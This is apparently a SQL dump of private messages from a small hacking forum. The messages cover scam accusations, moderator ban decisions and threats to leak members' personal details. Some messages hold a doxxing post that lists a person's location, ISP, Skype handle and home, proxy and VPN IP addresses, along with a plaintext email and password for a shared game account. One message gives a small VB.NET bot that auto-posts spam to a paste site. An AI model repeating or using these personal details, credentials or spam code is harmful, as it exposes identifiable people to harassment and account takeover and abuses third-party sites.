'0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3249', '82', '254', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'Re: You\'re Funny', '0', '[quote=\'Greed\'] [quote=\'iTzIpod\'] I see you were on the AQW account earlier today. I hope you are enjoying the AQW Account + the MC Account. Because you sir. Scammed me... You simply went on your email. And then clicked saying that you did not make this request. And changed the password and the email. Using your Master Account. I can tell you logged on the account because 1. I was never equipping those items. 2. My password is incorrect. You changed it obviously. 3. My email was changed also. I can\'t recover the account using my email. 4. You didn\'t go on Skype talking to me explaining what happened or anything. 5. You scammed me. :) Enjoy the accounts. [/quote] What if, hear me out, what if My computer was hacked, everything I owned all my accounts and I took all my time to get them back? And no I couldn\'t of gotten it back through that email, because that email confirmation was already used and couldn\'t be used again. The hacker got hold of my email, That holds every single payment purchase I made. I found out this yesterday that you could change the email by the transaction Id of the purchase, So it\'s not under my email no more. I had to redo my whole computer and every single of my accounts I had. You know how bad this sucks? I have to go around installing lots of crap onto my god damn computer! And I\'m fucking pissed. I\'ll talk to you later but right now I got work to do. [/quote] Really weird don\'t you think? I\'m not even going to bother...', '1350415423', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3251', '254', '61', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Hello', '0', 'I want you to know me and that one guy talked on skype and he said he is going to give my dox out. I just want to say if he puts my dox on here he can and who ever use the info will be reported to the fed\'s.', '1350420124', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3253', '61', '254', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'Re: Hello', '0', '[quote=\'Greed\'] I want you to know me and that one guy talked on skype and he said he is going to give my dox out. I just want to say if he puts my dox on here he can and who ever use the info will be reported to the fed\'s. [/quote] Who is threating to release A dox? Ipod?', '1350420242', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3255', '254', '61', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Hello', '0', '[quote=\'NXK\'] [quote=\'Greed\'] I want you to know me and that one guy talked on skype and he said he is going to give my dox out. I just want to say if he puts my dox on here he can and who ever use the info will be reported to the fed\'s. [/quote] Who is threating to release A dox? Ipod? [/quote] yes,[3:16:08 PM] Ryan | Jacob: Okay. [3:16:12 PM] Ryan | Jacob: Your dox is going up. [3:16:23 PM] Ryan | Jacob: Not like you\'ll care anyways. [3:16:28 PM] Zane Anderson: whats a dox? [3:16:52 PM] Ryan | Jacob: Don\'t worry... Enjoy your dox [3:37:06 PM] Ryan | Jacob: + your accounts [3:37:10 PM] Ryan | Jacob: + your ban [3:37:10 PM] Zane Anderson: dox? [3:37:14 PM] Ryan | Jacob: :) [3:37:20 PM] Ryan | Jacob: Bye [3:37:23 PM] Zane Anderson: whats a dox ', '1350420354', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3257', '61', '254', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'Re: Hello', '0', 'Talking to him VIA skype. I warned him.', '1350420501', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3259', '254', '61', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Hello', '0', '[quote=\'NXK\'] Talking to him VIA skype. I warned him. [/quote] okay thank you, I using a vpn just in case.', '1350420550', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3261', '61', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Proof.', '0', 'Take a Look at that scamming thread, I need a second opinion here. Should I ban him since Ipod proved it and greed isn\'t responding or what\'s your opinion?', '1350421024', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3264', '228', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'RE: Proof', '0', 'Hi, I Think we should ban him, because Ipod has good proof and Greed is not responding on PM messages. If we don\'t ban him we come to soft over to everyone. But this is my opinion. What did Joker say? ', '1350421319', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3266', '61', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Proof', '0', '[quote=\'VirtualLegend\'] Hi, I Think we should ban him, because Ipod has good proof and Greed is not responding on PM messages. If we don\'t ban him we come to soft over to everyone. But this is my opinion. What did Joker say? [/quote] Taking this one in our hands, He said he was leaving this one for us to decide. Ill take action and Do it.', '1350421353', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3387', '257', '100', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'that minecraft account ', '0', 'hey here is that premium account please dont change the passwordddddd username:the.big.d.man@hotmail.com password:chicken737 please dont change it. please say thanks on the thread rep me if i helped you and rate the thread if i helped you dont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)', '1350589563', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3268', '254', '1', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Just ban me', '0', '[quote=\'t3h jok3r\'] [quote=\'Greed\'] If there not going to listen, just ban me I have a lot of things to do like recovering all my accounts and my credit card from a hacker. So i\'ll see you when ever. [/quote] Sorry but I cant till I find outntue real scammer. [/quote] So you cant ban me? So I have to listen to all of this accusing of me?', '1350421382', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3270', '228', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Proof', '0', '[quote=\'NXK\'] [quote=\'VirtualLegend\'] Hi, I Think we should ban him, because Ipod has good proof and Greed is not responding on PM messages. If we don\'t ban him we come to soft over to everyone. But this is my opinion. What did Joker say? [/quote] Taking this one in our hands, He said he was leaving this one for us to decide. Ill take action and Do it. [/quote] Okay Thank you for letting me know ', '1350421494', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3273', '61', '254', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'Ban', '0', 'Since It was offsite You will not be Permentely Banned. Scamming no matter what Is not allowed, And you have failed to provide any actual proof you didn\'t Do it.', '1350421676', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3276', '62', '100', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Re: GFX Question', '0', '[quote=\'??zg???g????61\'] [quote=\'R?????zo?\'] [quote=\'??zg???g????61\'] Hey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D [/quote] it\'s called adobe photoshop CS6 (the newest one) probably the easiest one too. [/quote] Oh photoshop? Did you buy it?! 0_____0 [/quote] just get a cracked version.', '1350424983', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3278', '266', '61', '266', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Hey', '0', 'Can I have your skype so I can talk to you personally.', '1350425705', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3280', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: GFX Question', '0', '[quote=\'R?????zo?\'] [quote=\'??zg???g????61\'] [quote=\'R?????zo?\'] [quote=\'??zg???g????61\'] Hey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D [/quote] it\'s called adobe photoshop CS6 (the newest one) probably the easiest one too. [/quote] Oh photoshop? Did you buy it?! 0_____0 [/quote] just get a cracked version. [/quote] Oh last time I checked (bout a month ago) there were none. Thanks! You think you could possibly teach me some stuff? ', '1350425885', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3282', '266', '228', '266', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'hey', '0', 'Since your a mod, can I talk to you?', '1350426224', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3284', '61', '266', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"266\";}}', '2', 'Re: Hey', '0', '[quote=\'King Of Dunces\'] Can I have your skype so I can talk to you personally. [/quote] No Sorry.', '1350426921', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3286', '228', '266', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"266\";}}', '2', 'RE: hey', '0', 'Add me on Skype: VirtualLegend', '1350427087', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3288', '3', '100', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Custom Pastebin Source Code', '0', 'Here you go, Enjoy http://www.mediafire.com/download.php?bhiaiyz3op0d2go', '1350427220', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3290', '3', '62', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', '[All Members] Advance Member System', '0', 'Here you go Enjoy http://www.mediafire.com/download.php?hny4mxznomkje5t', '1350427402', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3292', '228', '222', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Hi', '0', 'Are You from europe ?', '1350429262', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3295', '222', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hi', '0', '[quote=\'VirtualLegend\'] Are You from europe ? [/quote] no why?', '1350433420', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3297', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'GFX Request (sorry for so much talking) ', '0', 'Hey, sorry for contacting you a lot lol, but you think you could make me a userbar that says \"DDoS\'ers\" ? I\'m changing ratters to DDoS\'ers because I like networking much more then ratting. Thanks', '1350433612', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3299', '222', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Hey', '0', 'Yo join our skype chat...add me. : flamingworm', '1350437943', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3301', '222', '5', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Hey', '0', 'Yo add me on skype and Ill add you to our skype chat...: flamingworm', '1350449383', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3304', '199', '1', '199', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'sup', '0', 'I\'ve just been a little busy lately.', '1350462065', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3306', '257', '222', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'hey ', '0', 'sorry but when you +reped me i didnt get this part Op NVM lmao thanks please explain', '1350466620', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3309', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hey// upgrade', '0', 'Hey Hi. I have a question. Im Elite atm, Can I upgrade even higher? In hackforums the also have l33t and then uber. I think there are a lot of elites right now so I d like to upgrade. If theres nothing like that Id just like to donate. Greetings', '1350489928', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3311', '228', '257', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Signature', '0', '[align=justify]Hi, Please let me know if you like it Signature: http://i.imgur.com/wqgiy.jpg[/align]', '1350490811', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3313', '228', '264', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"264\";}}', '2', 'Signature', '0', 'http://i.imgur.com/GgMTS.jpg What do you think? ', '1350493640', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3315', '222', '257', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey ', '0', '[quote=\'?(???)?TREYZ?(???)?\'] sorry but when you +reped me i didnt get this part Op NVM lmao thanks please explain [/quote] You didn\'t have any rep so I repped you...lolz', '1350495668', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3317', '264', '228', '264', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Signature', '0', '[quote=\'VirtualLegend\'] http://i.imgur.com/GgMTS.jpg What do you think? [/quote]', '1350495964', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3319', '264', '228', '264', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Signature', '0', '[quote=\'VirtualLegend\'] http://i.imgur.com/GgMTS.jpg What do you think? [/quote] Looks great!', '1350496007', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3322', '257', '222', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Re: hey ', '0', '[quote=\'ƒ???????????g\'] [quote=\'?(???)?TREYZ?(???)?\'] sorry but when you +reped me i didnt get this part Op NVM lmao thanks please explain [/quote] You didn\'t have any rep so I repped you...lolz [/quote] oh thanks alot, i think i already reped you :)', '1350503022', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3324', '257', '264', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"264\";}}', '2', 'hey ', '0', 'hey are into gaming if so come check out gamers section thanks mate', '1350520568', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3521', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Yo', '0', 'Hey Joker, I was wondering if you could send me the G3 Forums theme please.', '1350775294', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3331', '3', '2', '3', 'a:1:{s:2:\"to\";a:2:{i:0;s:2:\"67\";i:1;s:1:\"2\";}}', '2', 'Custom Pastebin Source Code', '0', 'Here you go, Enjoy http://www.mediafire.com/download.php?bhiaiyz3op0d2go', '1350523936', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3385', '222', '2', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Re: Source', '0', '[quote=\'Apathy\'] Could you send me the source? Thanks man. [/quote] Here you go bro. Code is nice and simple. Decided to not to include a webclient. You can change this any way you like to make ur own bot :P [code]Public Class Form1 Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click ToolStripStatusLabel2.Text = \"Browsing to Pasteheaven\" \'browse to pasteheaven WebBrowser1.Navigate(\"http://pasteheaven.com\") Do Until WebBrowser1.ReadyState = WebBrowserReadyState.Complete Application.DoEvents() Loop ToolStripStatusLabel2.Text = \"Done Browsing\" \'declare tags Dim l33thacking As HtmlElementCollection = WebBrowser1.Document.GetElementsByTagName(\"textarea\") For Each hacker As HtmlElement In l33thacking If hacker.GetAttribute(\"id\") = \"paste\" Then hacker.InnerText = \"Be sure to join http://l33thacking.net today for all the best hacking tutorials and content\" \'hacker.InnerText = \"Hey What\'s up\" \'Test Post End If Next Dim forsakenbeing As HtmlElementCollection = WebBrowser1.Document.GetElementsByTagName(\"input\") For Each awesomeness As HtmlElement In forsakenbeing \'For each element with id of title post the title below If awesomeness.GetAttribute(\"id\") = \"title\" Then awesomeness.InnerText = \"Join L33thacking.net\" End If \' click submit If awesomeness.GetAttribute(\"id\") = \"submit\" Then awesomeness.InvokeMember(\"click\") End If ToolStripStatusLabel2.Text = \"Creating paste\" Next ToolStripStatusLabel2.Text = \"Done. Check http://pasteheaven.com for your paste\" End Sub End Class[/code]', '1350565438', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3338', '272', '1', '272', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Your Dox - Love AF', '0', 'This is a sincere fuck you from Antagonism of AF. We have released your dox - [url=http://katethebait.cwahi.net/myforum/showthread.php?t=771994]http://pastebin.com/fz1SGJCK[/url]', '1350526354', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3341', '272', '1', '272', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Your Dox - Love AF', '0', '[quote=\'t3h jok3r\'] [quote=\'YuckFou\'] This is a sincere fuck you from Antagonism of AF. We have released your dox - [url=http://katethebait.cwahi.net/myforum/showthread.php?t=771994]http://pastebin.com/fz1SGJCK[/url] [/quote] Oh my god did you just get my VPN IP or did I just ignore the PM BITCH! [/quote] We\'ll be spreading it momentarily, bitch.', '1350526596', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3519', '270', '1', '270', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi there.', '0', '[quote=\'t3h jok3r\'] [quote=\'LCS\'] [quote=\'t3h jok3r\'] Hi, How are you today? If you haven\'t received this PM yet, then how do you find L33T Hacking so far? Feel free to share your experience, ideas, feedback anything you like. [/quote] I\'m good. I think LH is awesome we just need a few more members. Can I suggest a dedicated tab to monetizing? I personally would want to make it as active as it can be; a few people know about what I love, and that is online monetizing. Thanks! [/quote] True and the thing is that the monetizing section is not that active at the moment but we would add one when we get more active members. [/quote] I think that actually having a monetizing section could attract more members. I\'d post alot of tutorials/methods; and obviously I believe that it would help with the ranking on Google etc.', '1350774519', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3347', '61', '272', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"272\";}}', '2', 'congrats', '0', '108.171.103.148 Did you even bother to hide your ip? Oh and heres something for you to post on AF Lets begin shall we. State: Rio de Janeiro City: Duque De Caxias ISP: Vivo S.A. Organization: Vivo S.A. Username: The Anarchist Email: Unverified@hotmail.com Social Networking Skype: TheAnarchistAF MSN: unverified@hotmail.com WEBSITE Link: http://anarchyforums.net/ Hosting: koddos.com Nameservers: ns3.koddos.com and ns4.koddos.com 177.118.114.112 <= Home IP 200.166.184.19 <= Proxy IP 108.171.103.234 <= VPN IP ', '1350527059', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3349', '272', '61', '272', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: congrats', '0', '[quote=\'NXK\'] 108.171.103.148 Did you even bother to hide your ip? Oh and heres something for you to post on AF Lets begin shall we. State: Rio de Janeiro City: Duque De Caxias ISP: Vivo S.A. Organization: Vivo S.A. Username: The Anarchist Email: Unverified@hotmail.com Social Networking Skype: TheAnarchistAF MSN: unverified@hotmail.com WEBSITE Link: http://anarchyforums.net/ Hosting: koddos.com Nameservers: ns3.koddos.com and ns4.koddos.com 177.118.114.112 <= Home IP 200.166.184.19 <= Proxy IP 108.171.103.234 <= VPN IP [/quote] That\'s Anar, he\'s probably using a proxy chain.', '1350527100', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3351', '61', '272', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"272\";}}', '2', 'Re: congrats', '0', '[quote=\'YuckFou\'] [quote=\'NXK\'] 108.171.103.148 Did you even bother to hide your ip? Oh and heres something for you to post on AF Lets begin shall we. State: Rio de Janeiro City: Duque De Caxias ISP: Vivo S.A. Organization: Vivo S.A. Username: The Anarchist Email: Unverified@hotmail.com Social Networking Skype: TheAnarchistAF MSN: unverified@hotmail.com WEBSITE Link: http://anarchyforums.net/ Hosting: koddos.com Nameservers: ns3.koddos.com and ns4.koddos.com 177.118.114.112 <= Home IP 200.166.184.19 <= Proxy IP 108.171.103.234 <= VPN IP [/quote] That\'s Anar, he\'s probably using a proxy chain. [/quote] I\'ve already gotten through it. Post it on AF. Please. 